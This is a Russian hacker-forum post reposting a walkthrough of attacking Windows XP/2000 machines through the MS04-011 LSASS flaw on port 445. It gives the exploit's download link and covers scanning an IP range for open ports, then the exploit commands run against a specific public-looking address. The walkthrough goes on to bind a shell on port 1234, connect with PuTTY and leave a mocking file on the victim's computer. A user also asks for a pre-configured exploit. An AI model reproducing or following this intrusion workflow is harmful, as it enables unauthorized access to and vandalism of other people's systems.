Уязвимость XP хороший эксплойт — HackZona.Ru

Уязвимость XP хороший эксплойт

Уязвимость XP хороший эксплойт

Тип статьи:
Со старой ХакЗоны.
Источник:
Очень интересная статья про использование эксплойта автор все описал в подробности но!!! не написал как

у него сделан эксплойт !!!!!!!

Вопрос может кто нить и настроить исходник так что бы он открывал порт 1234 когда когда отакуешь через

445 порт а то я где то скачал но не на сайте securitylab.ru файл ms04011lsass.rar он только открывает 445 когда

порт уже открыт вообщем пишет так !!!!!!!
пишу expl.exe to xxx.xxx.xxx.xxx и порт 1234 в строке выдаеться типа
дело в том что я не умею компилировать файлы ((((((

[*]Connecting to 213.247.202.182 445ok! а у автора статьи выдает порт 1234 вот в чем гвоздь

[*]Attackingok!

Прочитайте статью и помогите чем можно напешите на почту [email protected] или на форуме плиз если

есть настроенный эксплойт дайте ссылку плиз!!! за ранее спасибо yhamobi
ссылка на эксплойт есть в статье там исходник!!!

А вот и сама статья
Автор:gemagla.b1n

Цель эксплоита: Remote DoS, Remote System
Воздействие эксплоита: Windows 2000 sp4, Windows XP sp1
Автор эксплоита: houseofdabus
Описание уязвимости: www.securitylab.ru/44490.html
Скачать эксплоит:
www.securitylab.ru/_Exploits/2004/04/04252004.ms04011lsass.rar
В этой статье я буду на реальном примере возводить эксплоит и опишу основные моменты использования

уязвимости.

Lets begin.

Для начала нам нужно слить эксплоит.сливаем.в моем случае я закачивал сорсы(исходники) и

откомпилировал.

Также понадобится любой сканер, я буду использовать ][Spider 6.5.Для меня он является самм лучшим и

надежным.

Также обяателен любой telnet-клиент, я воспользовался SecureCRT.

Target.

Вот тут нам понадобится сканер Х-spider.С помощью его надо найти цель.Как известно, на машине должен быть

открыт 445 порт.Этим и надо воспользоваться.Я пользовался Х-spiderом.Он легкий, не требователен к

ресурсам, имеет удобный интерфейс, да еще и бесплатно.=)

Надо найти цеь… В меню Х-spiderа выбираем Поиск и указываем диапазон IP-адрессом и ставим условие на

открытый 445 порт.

Вот что показад мне сканер:
— 213.247.202.177
— 213.247.202.178
— 213.247.202.179
— 213.247.202.180
— 213.247.202.181
+ 213.247.202.182
— 213.247.202.183

Видите +? Значит это машина с открытым 445 портом! Цель найдена.Это был только первый шаг.

Lets attack!

После того, как цель найдена, приступаем к возведению сплоита.Вот как это надо 10делать

Для начала определим удаленную ОС.Делаем это так

Запускаем коммандную строку и задаем путь к сплоиту..

C:expl.exe
Смотрим на поле Targets.0-ОС ХР. Если мы зададим параметр t, то можно определить удаленную ОС

C:expl.exe 0 213.247.202.182 1234-t

Результат:

Target:IP: 213.247.202.182: OS:WinXP Professional [universal] lsass.exe

[*] connecting to 213.247.202.182 OK

[*] Detecting remote OS:Windows 5.1

Смотрим вверх.5.1.

Detect remote OS:

Windows 5.1-WinXp

Ось мы определили… ХР!

Далее прсто пишем

C:expl.exe 0 213.247.202.182 1234 (без префикса t)

[*]Connecting to 213.247.202.182 1234ok!

[*]Attackingok!

Вот мы и соверили атаку на машину..

Теперь биндим там порт(я выбрал 1234, как вы видите)

Опять пишем:

C:expl.exe 0 213.247.202.182 1234

Повторяется все тоже самое, но теперь я забиндил 1234 порт на компе цели.

Теперь коннектимся

Я запускаю PuTTy и на вкладке Session указыва АйПи машины, порт(1234) и коннектюсь по протоколу Raw.

Конектимсяи мы уже в машине Задача выполненано! Не зря же мы старались… Надо немнофка пофалить!

Я оставлюя командой echo привет на компе!

C:>echo прива! Ламер ушастый!gemagla.b1n and Bcteam have you >hello.txt(оставляю послание в файле hello.txt)

Вот и все! Я вскрыл машины, оставил сообщение =)

Что я могу сказать по этому поводу? Во-первых эксплоит, приминенный мною, основан на RPC dcom.Бага еще

до сих пор актуальна

www.microsoft.com/technet/security/...n/MS04-011.mspx -патч.

В этот раз мне повезлоатака прошла успешно! Но мог бы быть и такой вариант:

Причин этому может быть несколько:
— помешал запущенный Firewall;
— объект атаки оказался пропатчен;
— не подошла версия операционной системы;
— компьютер жертвы вышел из сети





Нравится
Не нравится

4 комментария

18:29
[quote]Я пользовался Х-spiderом.Он легкий,не требователен к ресурсам,имеет удобный интерфейс,да еще и бесплатно.=)[/quote] X-Spider вроде бы платный
20:39
Воздействие эксплоита: Windows 2000 sp4, Windows XP sp1 - Оочень актуально)
Место для обсуждения этого вопроса действительно на форуме. Хорошо что хотя бы копирайты указаны.
22:18
Дырка под DCOM RPC очень старая и берёт свои корни с 2003 года за 5 лет наверно многое изменилось эта уязвимость уже неактуальна. Найденная дыра в службе Server примерно в 2007 году имеет больше шансов на реализацию.
18:57
да бред полный... одно старье, ребята вы давно хакерили или как в 2000 году начали тестить ошибки которые еще 11 лет назад штурмавали ... меняется время и стать и нужно менять ...